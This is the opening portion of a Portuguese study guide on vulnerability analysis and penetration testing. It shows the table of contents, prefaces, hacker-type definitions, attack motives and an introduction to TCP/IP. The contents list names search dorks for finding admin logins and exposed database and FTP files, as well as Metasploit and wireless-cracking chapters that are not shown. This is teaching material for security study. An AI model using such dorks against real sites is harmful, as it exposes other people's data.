Você está na página 1de 483

ADONEL BEZERRA

GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES


...............................................................................................................

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Sumrio
Prefcio......................................................................................................... 15
Objetivos: ..................................................................................................... 18
O conhecimento no , e nunca poder ser considerado como crime! ......... 18
Agradecimentos ............................................................................................ 19
Ataques e fraudes ......................................................................................... 20
12 motivos para um ataque a um sistema computacional ............................ 21
O que um hacker? ...................................................................................... 22
Descrio de alguns termos que a internet e a prpria imprensa mundial
ajudou a criar sobre hacker. .......................................................................... 23
White hat ...................................................................................................... 23
Black hat ....................................................................................................... 23
Script kiddies ................................................................................................ 23
Phreakers ...................................................................................................... 23
Carders.......................................................................................................... 24
Crackers ........................................................................................................ 24
Hacktivistes .................................................................................................. 24
Quem so os analistas de vulnerabilidades? ................................................. 24
As 04 Observaes mais importantes antes de contratar uma analise de
vulnerabilidades............................................................................................ 25
Introduo ao funcionamento da internet ..................................................... 26
Os protocolos de comunicao ..................................................................... 27
Protocolos Internet (TCP/IP) ........................................................................ 27
Tcnicas utilizadas para roubo de dados ...................................................... 31

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Quais riscos se tentam evitar com uma analise de vulnerabilidades? .......... 32
Erros cometidos pelos usurios finais e profissionais descuidados .............. 32
Acesso a contedos imprprios ou ofensivos ............................................... 32
Contato com pessoas mal-intencionadas ...................................................... 32
Sequestro de identidade ................................................................................ 33
Furto e perda de dados.................................................................................. 33
Invaso de privacidade ................................................................................. 33
Divulgao de boatos ................................................................................... 33
Dificuldade de excluso ............................................................................... 34
Dificuldade de detectar e expressar sentimentos .......................................... 34
Dificuldade de manter sigilo ........................................................................ 34
Pharming ...................................................................................................... 39
Golpes de comrcio eletrnico ..................................................................... 39
Golpe envolvendo sites de compras coletivas: ............................................. 40
Explorao de vulnerabilidades .................................................................... 41
Navegando pela superfcie da Web .............................................................. 45
A lgica booleana ......................................................................................... 47
AND ............................................................................................................. 47
OR ................................................................................................................ 48
NOT (-) ......................................................................................................... 48
ASPAS ( ) ................................................................................................. 48
Outros delimitadores de busca...................................................................... 48
Alguns exemplos de pesquisa....................................................................... 48

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Intext:clubedohacker .................................................................................... 48

Intitle:adonel ......................................................................................... 49

Inurl:adonel .......................................................................................... 49

site:gov ......................................................................................................... 49
site:org .......................................................................................................... 49
site:mil .......................................................................................................... 49
Filetype ......................................................................................................... 49
Servindo como scanner................................................................................. 50
Inurl:admin.asp ............................................................................................. 50
Inurl:/login/index.asp ................................................................................... 50
index of ......................................................................................................... 50
*.mdb :com.br "index of ............................................................................... 50
"ftp.txt" :.com.br "index of: ........................................................................ 50
Navegando pela web profunda ..................................................................... 51
A internet que muitos no veem!.................................................................. 51
Motores de busca .......................................................................................... 52
Vamos acessar alguns sites da deep web para servir como exemplo apenas.
Vale ressaltar que nessa camada da Internet no existem somente bandidos,
existe muito contedo melhor que na superfcie inclusive. Vale muito a pena
conhecer e explorar essa rea. Outra vantagem de voc navegar na deep web
o fato de estar sempre atualizado sobre as aes, os planos de ataque etc.
Estando navegando constantemente nela voc ter maiores chances de agir e
defender sua rede, bem com de seus clientes. .................................................. 54
Tor Mail........................................................................................................ 54
The Hidden Wiki .......................................................................................... 55

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Busca por Pessoas - pipl.com/ .......................................................................... 57
Organizao de uma anlise de vulnerabilidades ......................................... 67
O contrato, parte essencial............................................................................ 67
O que dizem as Leis?.................................................................................... 68
Das Infraes e Penalidades ......................................................................... 69
Lei n 7.102, de 20 de junho de 1983 (DOU de 21/06/1983) ................... 69
Lei n 8.137, de 27 de dezembro de 1990 (DOU de 28/12/1990) ............ 69
Lei n 8.159, de 08 de janeiro de 1991 (DOU de 09/01/1991) ................. 69
Lei n 8.977, de 06 de janeiro de 1995 ..................................................... 69
Lei n 9.296, de 24 de julho de 1996 ........................................................ 69
Lei n 9.295, de 19 de julho de 1996 (DOU de 20/07/1996 e retificada em
06/08/1996) .............................................................................................. 73
Lei n 9.472, de 16 de julho de 1997 (DOU de 17/07/1997) .................... 73
Lei n 9.610, de 19 de fevereiro de 1998 .................................................. 73
Lei n 9.609, de 19 de fevereiro de 1998 (DOU de 20/02/1998) .............. 73
Lei n 9.800, de 26 de maio de 1999 (DOU de 27/05/1999) .................... 73
Lei n 9.983, de 14 de julho de 2000 (DOU de 17/07/2000) .................... 73
Medida Provisria n 2.200-2, de 24 de agosto de 2001 (DOU de
27/08/2001) .............................................................................................. 73
Lei n 10.176, de 11 de janeiro de 2001 (DOU de 12/01/2001) ............... 73
Lei Complementar n 105, de 10 de janeiro de 2001 (DOU de 11/01/2001)
.................................................................................................................. 74
Lei n 10.520, de 17 de julho de 2002 (DOU 18/07/2002)....................... 74
Lei n 10.408, de 10 de janeiro de 2002 (DOU de 11/01/2002) ............... 74

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Lei n 10.753, de 30 de outubro de 2003 (DOU de 31/10/2003) .............. 74
Lei n 10.740, de 01 de outubro de 2003 (DOU de 02/10/2003) .............. 74
Lei n 10.664, de 22 de abril de 2003 (DOU de 23/04/2003) ................... 74
Lei n 10.077, de 30 de dezembro de 2004 (DOU de 31/12/2004) .......... 74
Lei n 10.973, de 02 de dezembro de 2004 (DOU de 03/12/2004) .......... 75
Lei n 11.196, de 21 de novembro de 2005 (DOU de 22/11/2005) .......... 75
Lei n 11.111, de 05 de maio de 2005 (DOU de 06/05/2005) .................. 75
Lei n 11.419, de 19 de dezembro de 2006 (DOU de 20/12/2006) .......... 75
Lei n 11.341, de 07 de agosto de 2006 (DOU de 08/08/2006). ............... 75
Lei n 11.280, de 16 de fevereiro de 2006 (DOU de 17/02/2006) ............ 75
Lei n 11.484, de 31 de maio de 2007 (DOU de 31/05/2007) .................. 76
Lei n 11.829, de 25 de novembro de 2008 (DOU de 26/11/2008) .......... 76
Lei n 11.934, de 05 de maio de 2009 (DOU de 06/05/2009) .................. 79
Lei n 11.903, de 14 de janeiro de 2009 (DOU de 15/01/2009) ............... 80
Lei n 11.900, de 08 de janeiro de 2009 (DOU de 09/01/2009) ............... 80
Lei n 12.249, de 11 de junho de 2010 (DOU de 14/06/2010) ................. 80
Lei n 12.270, de 24 de junho de 2010 ..................................................... 80
Lei n 12.258, de 15 de junho de 2010 (DOU de 16/06/2010) ................. 80
Medida Provisria n 534, de 20 de maio de 2011 (DOU de 23/05/2011)
.................................................................................................................. 80
Lei n 12.485, de 12 de maio de 2011 (DOU de 13/05/2011) .................. 80
Lei n 12.507, de 11 de outubro de 2011 (DOU de 13/10/2011) .............. 81
Lei n 12.527, de 18 de novembro de 2011 (DOU de 18/11/2011 ........... 81
Lei n 12.551, de 15 de dezembro de 2011............................................... 81

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Lei n 12.682, de 09 de julho de 2012 ...................................................... 81
Lei n 12.686, de 18 de julho de 2012 ...................................................... 81
Lei n 12.735, de 30 de novembro de 2012 (DOU de 03/12/2012) .......... 82
Lei n 12.737, de 30 de novembro de 2012 .............................................. 82
Decreto n 7.962, de 15 de maro de 2013 ............................................... 85
Art.187 do CPC ........................................................................................ 88
Objetivo ........................................................................................................ 90
Acordo de confidencialidade e responsabilidade ......................................... 90
Padres ......................................................................................................... 91
Metodologias ................................................................................................ 91
Reconhecimento ........................................................................................... 92
Detalhar todas as atividades ......................................................................... 92
Tipos de testes .............................................................................................. 93
Scanning ....................................................................................................... 93
Sondagem e Mapeamento......................................................................... 93
Fora Bruta ............................................................................................... 94
Anlise de Trfego de Rede ..................................................................... 94
Avaliao de Servidores Web .................................................................. 94
Obteno de acesso "Invaso" ...................................................................... 94
Manuteno do acesso .................................................................................. 94
Limpeza de rastros........................................................................................ 95
Documentao .............................................................................................. 95
Apresentao dos resultados e sugestes ..................................................... 95

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Backtrack e o Kali Linux .......................................................................... 95
Comandos em Shell Linux ........................................................................... 99
Usando o interpretador de comandos ......................................................... 100
Comandos de configurao e consulta de redes ......................................... 105
Alguns comandos teis ............................................................................... 108

.................................................................................................................... 109
Instalao de programas (pacotes).............................................................. 110
Compilao de programas .......................................................................... 111

........................................................................................ O que o Kali Linux? 114


Quais as funcionalidades do Kali Linux? ..................................................... 115
Onde esto as ferramentas no Kali? ........................................................... 118
Um pouco de Windows .................................................................................. 120

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Config.sys ............................................................................................... 121
Alguns comandos MS-DOS ................................................................... 123
Controladores de dispositivos instvel ................................................... 124
Autoexec.bat ........................................................................................... 126
Principais comandos utilizados no autoexec.bat .................................... 127
IO.SYS ................................................................................................... 128
Parmetros do Config.sys incorporadas ao IO.SYS ............................... 129
COMMAND.COM................................................................................. 130
Como acessar o MS-DOS ........................................................................... 130
O que o registro no Windows? ............................................................ 132
Origens do registro ................................................................................. 132
Arquivos do registro no Windows .......................................................... 133
Navegando pelo registro ......................................................................... 134
O Registro nas verses de 64 bits do Windows,..................................... 138
Ferramentas para edio do registro ....................................................... 139
Alguns comandos para execuo de tarefas via prompt cmd.exe .......... 140
Comandos de rede no Windows ............................................................. 145
Comando teis para serem executados via executar .............................. 146
Windows PowerShell ..................................................................................... 196
Conceitos bsicos do Windows PowerShell................................................... 197
A PILHA TCP/IP ........................................................................................... 201
Diferena entre o protocolo TCP e UDP .................................................... 202
Servios de Rede - Configurando uma rede ................................................... 206

www.clubedohacker.com.br

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Comandos do TELNET .................................................................................. 208
Comandos do TELNET e FTP ....................................................................... 210
Comandos para conexo via SSH.................................................................. 211
Um pouco mais sobre os pacotes em rede ...................................................... 212
Analisador de protocolos Wireshark .............................................................. 213
Clonando o endereo MAC ............................................................................ 218
As Ferramentas do Backtrack Linux e Kali................................................ 220
Introduo ao NMAP ................................................................................. 222
Fundamentos do escaneamento de portas................................................... 224
Os seis estados de porta reconhecidos pelo Nmap ..................................... 225
Comunicao TCP ...................................................................................... 226
Ex: Three Way Handshake ......................................................................... 227
Conexo estabelecida ................................................................................. 227
Tcnicas de varredura com Nmap .............................................................. 227
Alguns exemplos prticos........................................................................... 230
Traceroute com nmap ................................................................................. 234
Exame de lista: -sL ..................................................................................... 236
Exame por ping com nmap: -sP.................................................................. 237
Tcnicas de descobertas de hosts ............................................................... 238
Ping por TCP SYN (-PS<lista de portas>) ................................................. 240
Ping por TCP ACK: -PA + <lista de portas> ............................................. 241
Ping de UDP (-PU<lista de portas) ............................................................ 242
Outros tipos de ping de ICMP (-PE, -PP, e -PM) ....................................... 243

www.clubedohacker.com.br

10

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Ping de protocolo IP ( -PO<lista de protocolos>........................................ 244
Mecanismo de scripts do nmap ................................................................. 245
As categorias de scripts .............................................................................. 245
Lista de scripts ............................................................................................ 251
TCPDump ................................................................................................... 341
Metasploit Framework ............................................................................... 344
Comandos teis no metasploit .................................................................... 345
Praticando com o Metasploit. ..................................................................... 348
Invadindo com exploit ................................................................................ 350
Ataque do lado do cliente!.......................................................................... 363
Gerando um VBScript e injetando a carga "payload" ............................... 366
Armitage ..................................................................................................... 377
httsquash ..................................................................................................... 381
netifera ........................................................................................................ 382
Protocolo SCTP .......................................................................................... 383
O Sctpscan. ..................................................................................................... 387
testssl.sh...................................................................................................... 390
hexinject ..................................................................................................... 391
#./hexinject -s eth0 ..................................................................................... 394
tcpreplay ..................................................................................................... 394
Asp-auditor ................................................................................................. 397
DarkmySqli ................................................................................................ 398
Joomscan .................................................................................................... 400

www.clubedohacker.com.br

11

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Plecost ........................................................................................................ 401
Untidy ......................................................................................................... 403
#./WebSlayer.py ......................................................................................... 405
Essa a tela inicial dentro do diretrio e voc pode execut-lo com o comando
./WebSlayer.py ............................................................................................... 405
DirBuster .................................................................................................... 408
OWASP Mantra ......................................................................................... 410
#./OWASP\ Mantra .................................................................................... 411
Powerfuzzer ................................................................................................ 414
Trabalhando com o Powerfuzzer ................................................................ 415
#./powerfuzzer.py ....................................................................................... 416
Configurando um proxy no Powerfuzzer ................................................... 418
# ./w3af ...................................................................................................... 419
Grendel scan ............................................................................................... 425
#./grendel.sh ............................................................................................... 426
Beef ............................................................................................................ 428
BurpSuite .................................................................................................... 435
Fimap .......................................................................................................... 439
Dradis Framework ...................................................................................... 440
Ataque a redes wireless .............................................................................. 445
Padres wifi ................................................................................................ 447
Autenticao e autorizao ......................................................................... 448
Modo Monitor ............................................................................................ 449
Ferramentas para auditoria em Wireless .................................................... 450

www.clubedohacker.com.br

12

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Airmon-ng .................................................................................................. 451
Airodump-ng .............................................................................................. 451
Aireplay-ng ................................................................................................. 456
Modo filtro ................................................................................................. 457
Modo replay: .............................................................................................. 457
Modo ataque: .............................................................................................. 458
Opes do ataque Fakeauth: ....................................................................... 458
Airbase-ng .................................................................................................. 459
Aircrack-ng ................................................................................................. 460
Airdecap-ng ................................................................................................ 461
Passos para um ataque a uma rede wireless ............................................... 462
Conhecendo melhor e praticando com o macchanger ........................... 466
Organizando um ataque em infraestrutura wireless ................................... 466
airmon-ng ................................................................................................... 467
Praticando com o airodump ........................................................................ 468
Quebrar a senha com o aircrack ................................................................. 469
Wifitap ........................................................................................................ 474
~# wifitap.py .............................................................................................. 475
Auditando senhas com o John The Ripper ................................................. 477
Criando wordlist ......................................................................................... 480
Bibliogrfica ................................................................................................... 481

www.clubedohacker.com.br

13

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Todos os direitos para a lingua portuguesa reservados por Adonel


Bezerra
De acordo com a Lei 9.610, de 19/2/1998, nenhuma parte desta obra
poder ser reproduzida. transmitida e gravada, por qualquer meio
eletrnico, mecnico, por fotocpia e outros, sem a prvia autorizao,
por escrito do autor.

Autor: Adonel Bezerra


Editor: Adonel Bezerra
Capa: Roberto Mendes de Lima
Diagramao: Adonel Bezerra
Assistente Editorial: Stefany Miranda

Diversas Marcas Registradas aparecem no decorrer dessa obra. Mais do


que simplesmente listar tais nomes e informar quem possui seus
direitos de explorao, ou ainda imprimir os logotipos das mesmas, o
editor declara estar utilizando tais nomes apenas para fins editoriais,
em beneficio exclusivo do dono da Marca Registrada, sem inteno de
infringir as regras de sua utilizao.
Qualquer semelhana em nomes prprios e acontecimentos ser mera
coincidncia.

www.clubedohacker.com.br

14

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Prefcio
Este livro uma slida construo sobre o tema anlise de
vulnerabilidades. Seja pelo seu aspecto didtico como se apresenta ou
ainda pelo seu aspecto tcnico relevante. Aborda elementos essenciais
relacionados vulnerabilidades em redes e sistemas.
Em um primeiro plano, temas importantes como protocolos de
comunicao, pilha TCP/IP, web profunda so esclarecidos pelo autor.
A partir deste ponto, traado um roteiro de organizao para uma
anlise de vulnerabilidade que representa boas prticas para o processo
de identificao de fragilidades, falha e potenciais ameaas em redes e
sistemas.
Consolidados os contedos iniciais, o leitor ter acesso ao
Backtrack, ao Kali Linux e o seu poderoso arsenal de ferramentas
reunidos em um nico ambiente. Assim, solues como Metasploit e
Nmap esto integradas ao BackTrack e ao Kali Linux como uma forma
de agilizar o trabalho de profissionais da rea de redes de computadores
bem como todos aqueles que desejam adquirir conhecimentos sobre
anlise de vulnerabilidades de uma forma prtica, produtiva e objetiva.
Neste contexto, no demais argumentar que profissionais que
dominam esse conhecimento so cada vez mais requisitados por

www.clubedohacker.com.br

15

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
empresas interessadas em manter uma intensa colaborao entre
analistas de vulnerabilidade e suas equipes que atuam no processo de
desenvolvimento de sistemas. Pois, assim, a empresa estar atuando de
forma preventiva ao submeter seus sistemas, antes de serem colocados
em ambiente de produo, a rigorosos testes de vulnerabilidades.
Enfim, esperamos que o texto seja til e sirva como motivao para
estudos cada vez mais aprofundados sobre o tema.

Prof. Antonio Eduardo Rocha Lobo


Especialista em Processamento da Informao

www.clubedohacker.com.br

16

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Aprenda com quem faz. Esse sempre foi o lema dos cursos,
workshops e palestras ministrados pelo professor Adonel Bezerra por
todo o Brasil.
Os milhares de alunos que tiveram a oportunidade de participar
de um dos seus treinamentos sabem da maneira simples, objetiva e
didtica que o autor consegue expor e ensinar os temas abordados, sejam
dos mais simples aos mais complexos.
A paixo pela sala de aula, a experincia acumulada em quase 20
anos dentro dos laboratrios de informtica, o engajamento nos
movimentos de softwares livres, o pioneirismo na difuso da filosofia do
hacker tico atravs do seu portal Clube do Hacker, tornam o autor um
profissional completo e uma das maiores autoridades no setor de
segurana da informao do pas.
Como colega do autor, profissional da rea de tecnologia da
informao e advogado focado nas causas de direito digital, tive a honra
de ser convidado a escrever o prefcio deste livro.
Esta obra um divisor de guas onde o leitor vai aprender passoa-passo como identificar, analisar, explorar e defender a rede de
computadores que administra. O que era guardado a sete chaves pelos
profissionais mais experientes da rea e ningum ensinava agora est
revelado neste livro. Alis, transmitir o conhecimento de forma plena e
sem censura sempre foi o diferencial dos treinamentos do professor
Adonel Bezerra, um verdadeiro Mister M dos hackers.
Para construir o conhecimento de forma sistmica as redes sero
balanadas, os motores da internet sero destrinchados, o submundo ser
exposto. Tudo isso para voc se tornar um verdadeiro Analista de
Vulnerabilidade.
Peterson Motta
OAB-AM 7051 pmotta.adv@gmail.com

www.clubedohacker.com.br

17

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Objetivos: Considero como conclusa essa obra se ao final dela voc
conseguir fazer uma boa analise de vulnerabilidades em sua rede,
sistema computacional ou mesmo em seu site.
Esse projeto visa ser um guia acessvel a todos que desejam aprender a
profisso de analista de vulnerabilidades em sistemas e redes;
Creio que assim, poderemos afirmar que estamos cumprindo com
nosso papel sem sair da proposta de nosso site
www.clubedohacker.com.br que levar informaes de qualidade a
todos os cantos e ajudar, mesmo que de forma modesta na
democratizao e segurana da informao.

O conhecimento no , e nunca poder ser considerado como


crime!
Conhecer as ferramentas existentes, aprender invaso de sistemas
computacionais para testes de vulnerabilidades, desde que com as
devidas autorizaes no crime e o colocar em vantagens no
mercado, pois os profissionais que detm tal conhecimento tm sido
cada vez mais requisitados pelas empresas de todos os setores. So
esses profissionais que tem colaborado efetivamente com as outras
equipes, agindo de forma proativa, pois antes de os sistemas serem

www.clubedohacker.com.br

18

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
colocados em ambiente de produo j passaram por diversos testes de
vulnerabilidades, os mais diversos ataques, tentativas de invaso etc.
Ns sabemos que no existe segurana 100%, mais podemos minimizar
e muito os riscos de ter nossos sistemas invadidos por terceiros se
fizermos uma boa analise de vulnerabilidades antes de coloca-los em
ambiente de produo.

Agradecimentos
Eu jamais conseguiria fazer qualquer coisa em minha vida sem a
colaborao de terceiros, seja um amigo, um colega de trabalho, um
aluno, professor enfim. Se eu viver mais de uma vida, jamais perderei a
oportunidade de agradecer a vocs por existirem em minha vida.
Agradeo a Deus todos os dias por estar vivo para presenciar e
desfrutar da companhia de tantas pessoas que ele tem me apresentado.
Mais algumas pessoas se destacam e iluminam nossas vidas, mesmo
que estejam distantes.
Agradeo ao Prof. Raphael meu professor no curso de direito, ainda me
recordo de suas lies no 1.o perodo e pode ter certeza que me foram
de grande valia.

www.clubedohacker.com.br

19

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Aos meus alunos do curso de analista de vulnerabilidades em sistemas
e redes que continuam me cobrando cada vez mais conhecimento,
mesmo sem dizer uma nica palavra eu sinto que eles querem sempre
mais e a busca no para nunca.
A Stefany Miranda por me aturar como colega de trabalho na
Academia Linux, Clube do Hacker e Seclinux e por ter me ajudado na
reviso dessa obra.
A Sana Cavalcante por ser uma pessoa como poucas, dentre s milhares
de pessoas que j conheci.
A minha famlia que eu amo!

Ataques e fraudes
Qualquer computador conectado a uma rede potencialmente
vulnervel a um ou vrios ataques.
Para efeitos de abordagem nessa obra, um ataque" pode ser
entendido como a explorao de determinada falha em um sistema de
informtica para fins no conhecidos pelo administrador dos sistemas e
na maioria dos casos termina em prejuzos para os mantenedores e ou
proprietrios.
Na Internet, os ataques acontecem permanentemente na ordem de
milhares de por minuto sobre os milhes de mquinas conectadas a
rede mundial.

www.clubedohacker.com.br

20

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Estes ataques so, em maior parte, lanados automaticamente a partir
de mquinas infectadas por softwares de controle remoto, sem que seu
proprietrio tenha qualquer conhecimento sobre o fato.
Para enfrentar estes ataques indispensvel conhecer os seus sistemas,
os principais tipos de ataques e aprender a utiliz-los, pois s assim
voc estar apto a agir proativamente lutando em igualdade de
condies no mesmo campo do que podemos chamar aqui de, seu
inimigo oculto.

12 motivos para um ataque a um sistema computacional


Porque algum dispara um ataque a determinado sistema
computacional ou mesmo a milhares de sistemas espalhados em redor
da terra e conectados a rede mundial de computadores?
Na maioria das vezes esses ataques tem o objetivo de:
Roubar informaes, como segredos industriais ou propriedade
intelectual;
2.
Roubar informaes pessoais de determinado usurio para uso
ilcito;
3.
Roubar dados bancrios;
4.
Derrubar um servio em execuo no sistema com o objetivo de
prejudicar os negcios ou mesmo por represlia;
5.
Utilizar o sistema do usurio como salto para um ataque maior
a outros sistemas computacionais;
6.
Vandalismo, com o objetivo de ganhar fama nos grupos, fruns
etc.
7.
Roubo de sesso (sesso hijacking), para crimes financeiros ou
para descobrir segredos de terceiros;
8.
Sequestro de identidade;
1.

www.clubedohacker.com.br

21

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Desvio ou alterao de mensagens para prejudicar o usurio real;
Roubo de dados sigilosos atravs de keylogger fsico ou
programas de captura de teclas etc.
11.
Explorao de vulnerabilidade dos "softwares" servidores
desatualizados ou mantidos sem as devidas protees;
12.
Varrimento das portas, com o objetivo de descobrir verses de
servios a aplicaes em uso.
9.
10.

Da a necessidade de se fazer uma boa analise de vulnerabilidades com


o objetivo de detectar possveis falhas que permitam explorao e
acesso no autorizado. Assim poderemos corrigir os problemas de
configuraes inadequadas, servios desnecessrios que foram
habilitados automaticamente nas instalaes, falhas de softwares e
demais problemas encontrados, agindo de forma proativa.

O que um hacker?
O termo hacker utilizado frequentemente para designar um pirata
de computador. Confesso que j estou cheio desse palavreado de o que
um hacker ou isso ou aquilo.
Uma resposta impressa e a todos aqueles que gostam de criar
smbolos: um hacker pode at vir a cometer crimes um dia.
Conhecimento pra isso ele tem!
Mas um criminoso jamais ser um hacker.

www.clubedohacker.com.br

22

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Descrio de alguns termos que a internet e a prpria imprensa
mundial ajudou a criar sobre hacker.
O termo hacker j existe desde antes dos anos 50, era utilizado de
forma positiva para homenagear os programadores emritos, serviu
durante os anos 70, para descrever os revolucionrios da informtica,
que na sua maior parte se tornaram os fundadores das maiores
empresas de informtica do mundo etc.
Hoje, esta palavra frequentemente utilizada sem nenhuma razo, para
designar as pessoas que invadem os sistemas de informtica para
roubar dados e cometer atos ilcitos.
White hat: Hackers no sentido nobre do termo, cujo objetivo ajudar
melhoria dos sistemas e tecnologias, esto geralmente na origem dos
principais protocolos e instrumentos informticos que utilizamos hoje
em dia.
Black hat: Mais correntemente chamados piratas ou pessoas que se
introduzem nos sistemas informticos com um objetivo prejudicial, de
forma criminosa em alguns pases onde tem legislao especificas para
crimes digitais, (Para que haja um crime, necessrio que exista uma
Lei que o tipifique. No caso do Brasil ns temos a Lei 12.737 e outras
que ser objeto de estudo no capitulo 02).
Script kiddies: So considerados como os novatos, usurios da rede
que utilizam programas encontrados na Internet, geralmente detm
conhecimentos limitados e passam o tempo varrendo os sistemas de
informtica a fim de se divertirem.
Phreakers: So denominados de piratas de telefonia que se interessam
pela rede telefnica, normalmente gostam de fazer grampos e podem

www.clubedohacker.com.br

23

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
trabalhar na aquisio de segredos industriais e comerciais,
investigaes de adultrios ou outras investigaes ilegais etc.
Carders: Se interessam principalmente por carto, principalmente os
cartes bancrios e cartes de crdito, normalmente utilizam-se de
programas de captura de dados para extrair dos computadores e gravar
em bases de dados remotas e utiliza-los posteriormente para fazer
compras at saques.
Crackers: Programadores, cujo objetivo criar software que
permitem atacar sistemas de informtica ou quebrar protees contra a
cpia dos softwares pagos (Um crack, pode ser entendido como um
programa executvel, encarregado de alterar determinado software
original e quebrar as protees).
Hacktivistes: So hackers cuja motivao essencialmente ideolgica,
atacam sites governamentais e de grandes corporaes e adoram estar
na mdia (normalmente se organizam em grupos geograficamente
distribudos).
No irei mais me alongar nesse assunto. Pois j est demasiadamente
difundido no ceio da sociedade. Citei nessa obra apenas com o objetivo
de manifestar minha opinio sobre o tema. Coisa que j fao a mais de
duas dcadas seja atravs do meu site ou mesmo atravs da imprensa.

Quem so os analistas de vulnerabilidades?


Os analistas de vulnerabilidades so profissionais com bastante
conhecimento da matria, normalmente profissionais oriundos de redes
ou programao, so profissionais que normalmente trabalham com a
responsabilidade de apontar falhas nos sistemas computacionais, so
incansveis em sua tarefa e procuram estar atento a tudo que acontece na

www.clubedohacker.com.br

24

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
rede, ele capaz de detectar falhas em sistemas e redes agindo
proativamente e procurando manter as equipes de suporte sempre
atualizadas e alerta no que se refere a falhas de projeto, configurao,
desenvolvimento e implementao.

As 04 Observaes mais importantes antes de contratar uma


analise de vulnerabilidades
Uma analise de vulnerabilidades "Teste de invaso" uma prtica de
valor inestimvel para todas as organizaes, sejam publicas ou
privadas, bem antes de ser colocado qualquer sistema computacional em
ambiente de produo. Agindo assim, pode-se ter certeza da capacidade
de resistncia de tais sistemas a um ataque externo ou interno. Mais
como contratar uma empresa ou profissional para um trabalho to srio?
Sabendo que voc poder expor os dados da companhia a terceiros!
importante adotar alguns critrios, j que esse tipo de profissional no se
contrata atravs de anncio na imprensa.

Deve-se avaliar adotando os mais rgidos critrios;


Avaliar o tipo de mdia que a empresa se utiliza para divulgar
seus servios, sempre que possvel deve-se fugir do
sensacionalismo exagerado, nem sempre quem investe mais em
mdia tem a melhor soluo;
Contratar sob CLT tem sido uma boa prtica, procura se
identificar na prpria equipe de TI algum profissional com tal
perfil e investir em cursos livres para ter o melhor analista de
vulnerabilidades dentro da organizao com exclusividade;
A contratao de pessoa fsica deve ser evitada sempre que
possvel, mais se o projeto pequeno e tem oramento apertado
pode-se procurar um profissional especialista nessa rea e que

www.clubedohacker.com.br

25

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
prestar tal servio, nesse caso os critrios de avaliao devem
ser mais rigorosos.

Introduo ao funcionamento da internet


A Internet uma rede mundial de computadores que utilizam um
conjunto de protocolos de rede (a pilha TCP/IP). Uma rede de
computadores um conjunto de dois ou mais computadores onde a
partir de um meio de comunicao possvel trocar informaes entre
eles atravs de acesso ao meio de comunicao. (Informaes sobre
toda essa pilha pode ser encontra em: http://www.rfc-editor.org/).
Existem diversos meios de comunicao e so classificados como
meio de comunicao guiados (ex: fios de cobre, fibra tica) e meio
de comunicao no guiados (ex: ondas de rdio, micro-ondas etc.)
possvel acessar a Internet utilizando qualquer desses meios, desde
que, utilizem-se dos protocolos adequados. A infraestrutura fsica da
Internet composta por cabos de fibra-tica em backbones
intercontinentais e satlites, assim, para se conectar a Internet, basta
ter acesso rede telefnica publica cabos ou comunicao sem fio
interligado a um provedor de acesso que ira fazer a ponte entre uma
maquina em qualquer local do mundo e a rede mundial de
computadores.

www.clubedohacker.com.br

26

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Os protocolos de comunicao
Para que dois ou mais computadores se comuniquem, necessrio
que se utilizem dos mesmos protocolos de comunicao, esta
linguagem deve ser de compreenso de todos. Na Internet, o
protocolo padro utilizado pelas mquinas composto por uma pilha
de vrios protocolos, cada um responsvel por servios distintos "o
TCP/IP", que teve origem na dcada de 70 e nos anos 80 tornou-se o
protocolo padro. O TCP/IP define uma pilha de camadas de
comunicao, cada uma com um protocolo prprio, a saber:
Protocolos Internet (TCP/IP)
Camada
1 Fsica, ou
Acesso internet.

2 - Rede
3 - Transporte
4 - Aplicao

Servios dispoveis
